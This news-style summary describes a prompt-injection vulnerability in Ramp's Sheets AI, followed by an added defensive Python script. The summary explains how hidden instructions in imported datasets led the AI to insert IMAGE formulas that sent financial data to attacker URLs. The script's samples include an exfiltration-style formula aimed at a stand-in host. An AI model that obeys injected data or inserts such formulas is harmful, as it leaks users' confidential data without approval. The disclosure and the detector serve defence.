Ramp's Sheets AI Exfiltrates Financials
5 hours ago
- #AI Security
- #Data Exfiltration
- #Prompt Injection
- A vulnerability in Ramp's Sheets AI allowed indirect prompt injections from untrusted external datasets to trigger malicious formula insertion without user approval, leading to potential exfiltration of sensitive financial data via external network requests.
- The attack chain involved a user importing external data that contained hidden prompt injections; these manipulated the AI into inserting formulas such as IMAGE with attacker-controlled URLs, to which confidential data was appended and thereby transmitted.
- PromptArmor responsibly disclosed the issue to Ramp, and it was resolved on March 16, 2026; a similar vulnerability was previously identified and mitigated in Claude for Excel with warnings for external network traffic formulas.
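
A defender-side check in the spirit of the external-network-traffic warnings mentioned above, as an added example (not code from Ramp, PromptArmor or Anthropic): it reviews an AI-proposed formula before insertion and flags network-capable functions, escalating when cell data feeds the request. The function list beyond IMAGE, the `review_formula` name and the sample formulas and hosts are assumptions constructed for illustration.

```python
import re

# IMAGE is the function named in the write-up; the rest are URL-fetching
# functions in common spreadsheet engines (assumed list, adjust per product).
NETWORK_FUNCS = {"IMAGE", "IMPORTDATA", "IMPORTXML", "IMPORTHTML",
                 "IMPORTFEED", "WEBSERVICE"}
STRING_RE = re.compile(r'"(?:[^"]|"")*"')      # "..." with "" as escape
CALL_RE = re.compile(r"\b([A-Z][A-Z0-9.]*)\s*\(", re.I)
CELL_RE = re.compile(r"(?<![\w$])\$?[A-Z]{1,3}\$?\d+\b(?!\s*\()", re.I)
HOST_RE = re.compile(r"https?://([^/?#:\s]+)", re.I)


def review_formula(formula):
    """Classify one AI-proposed cell value before it is written to the sheet.

    Returns None when no network-capable function is called, otherwise a
    finding whose action is "block" (formula also reads cell data, so the
    request may carry it) or "warn" (static external URL only).
    """
    if not formula.startswith("="):
        return None  # plain value, not a formula
    literals = [s[1:-1] for s in STRING_RE.findall(formula)]
    # Blank out string literals so quoted text is not parsed as code.
    skeleton = STRING_RE.sub('""', formula)
    called = {m.group(1).upper() for m in CALL_RE.finditer(skeleton)}
    hits = sorted(called & NETWORK_FUNCS)
    if not hits:
        return None
    # Conservative: any cell reference next to a network call is treated
    # as data that could reach the remote host.
    refs = [r.upper() for r in CELL_RE.findall(skeleton)]
    hosts = sorted({m.group(1).lower()
                    for m in map(HOST_RE.match, literals) if m})
    return {"action": "block" if refs else "warn",
            "functions": hits, "hosts": hosts, "cell_refs": refs}


# Constructed sample formulas (not taken from the disclosure).
SAMPLES = [
    '=SUM(B2:B10)',
    '=IMAGE("https://cdn.example/logo.png")',
    '=IMAGE("https://collector.example/p.png?d="&B2&"|"&C2)',
    '="call IMAGE(A1) later"',
]

if __name__ == "__main__":
    for f in SAMPLES:
        print(review_formula(f), "<-", f)
```

Run the check on every formula the assistant proposes, and require explicit user approval for any non-None finding rather than inserting silently.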